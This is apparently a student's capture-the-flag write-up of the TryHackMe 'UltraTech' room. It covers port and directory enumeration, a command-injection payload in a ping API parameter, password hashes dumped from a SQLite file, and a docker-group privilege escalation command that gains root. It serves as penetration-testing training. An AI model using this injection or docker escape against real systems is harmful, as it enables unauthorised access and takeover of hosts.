TryHackMe | UltraTech

A TryHackMe room that involves the basics of penetration testing, enumeration, privilege escalation and webapp testing.

Ultratech

Tasks

  • Identify software on ports.

Vulnerabilities

  • API is not secure.Should practice least privilege.

Nmap

Discovered open port 21/tcp on 10.10.112.55 vsftpd 3.0.3
Discovered open port 22/tcp on 10.10.112.55 opensh 7.6p1
Discovered open port 8081/tcp on 10.10.112.55 Node.js
Discovered open port 31331/tcp on 10.10.122.55 Apache

I used tag -v to print out the open ports when found.

Gobuster

  • Navigate to the apache web server on port 31331.
/images               (Status: 301) [Size: 322]/index.html           (Status: 200) [Size: 6092]                                       
/index.html (Status: 200) [Size: 6092]
/javascript (Status: 301) [Size: 326]
/js (Status: 301) [Size: 318

/partners.html (Status: 200) [Size: 1986]
/robots.txt (Status: 200) [Size: 53]
/robots.txt (Status: 200) [Size: 53]
/server-status (Status: 403) [Size: 303]
/what.html (Status: 200) [Size: 2534]

Foothold

  • We can navigate to the login page at /partners.html
http://10.10.112.55:8081/ping?ip=10.10.112.55
  • Tinkering a bit with the value, it can perform unix code execution.
10.10.112.55:8081/ping?ip=`ls`
ping: utech.db.sqlite: Name or service not known
  • Let’s cat out the credentials in utech.db.sqlite
(Mr00tf357a0c52799563c7c7b76c1e7543a32)Madmin0d0ea5111e3c1def594c1684e3b9be84
  • hashid confirms it is MD variant.

Privesc

  • User is not able to run sudo
r00t@ultratech-prod: sudo -l
Sorry, user r00t may not run sudo on this machine.
  • Use linpeas to enumerate.
uid=1001(r00t) gid=1001(r00t) groups=1001(r00t),116(docker)
  • We are apart of the docker group, perhaps there is an entry for it on GTFObins.
./docker run -v /:/mnt --rm -it alpine chroot /mnt sh
  • Alpine will be the image, but since there isn’t one locally, we’ll list out images that are available in the machine.
CONTAINER ID        IMAGE               COMMAND                  CREATED             STATUS                     PORTS               NAMES
7beaaeecd784 bash "docker-entrypoint.s…" 2 years ago Exited (130) 2 years ago unruffled_shockley
696fb9b45ae5 bash "docker-entrypoint.s…" 2 years ago Exited (127) 2 years ago boring_varahamihira
9811859c4c5c bash "docker-entrypoint.s…" 2 years ago Exited (127) 2 years ago boring_volhard
  • Now let’s run that with docker
docker run -v /:/mnt --rm -it bash chroot /mnt sh
  • And now we are root.

Student that loves FOSS